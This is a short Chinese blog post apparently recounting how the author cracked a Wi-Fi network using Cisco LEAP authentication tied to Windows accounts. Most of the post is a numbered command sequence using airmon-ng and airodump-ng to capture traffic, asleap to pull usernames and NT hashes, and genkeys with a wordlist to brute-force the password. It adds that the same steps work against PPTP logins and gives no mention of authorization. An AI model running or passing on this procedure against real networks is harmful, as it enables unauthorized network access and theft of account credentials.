两年前碰到的案例,当时看到Wi-Fi是WEP加密的,以为可以秒破,结果跑出来的密码很怪异,明显不对,后来发觉是使用cisco的LEAP认证方式,通过windows的账号认证,网上没有找到相关破解资料,记录一下。
具体破解过程主要使用 aircrack-ng + asleap + genkeys 即可完成,Kali自带,前几步无线抓包标准步骤,不详说,关键步骤标红备注:
一、ifconfig waln0 up
二、airmon-ng start wlan0
三、airodump-ng mon0
四、airodump-ng -w leap mon0
五、asleap -r leap-01.cap
//读取无线包中明文用户名及密码hash,如果没有,继续抓
//抓取nt hash后暴力碰撞还是比较容易的,可以直接放到一些在线平台跑
//也可以继续使用下面两步
六、genkeys -r passwordlist.txt -f list.dat -n list.idat
//使用密码字典生成密码hash字典
七、asleap -r leap-01.cap -f list.dat -n list.idat
//暴力匹配破解密码
这个步骤也可以用来跑pptp的用户名密码。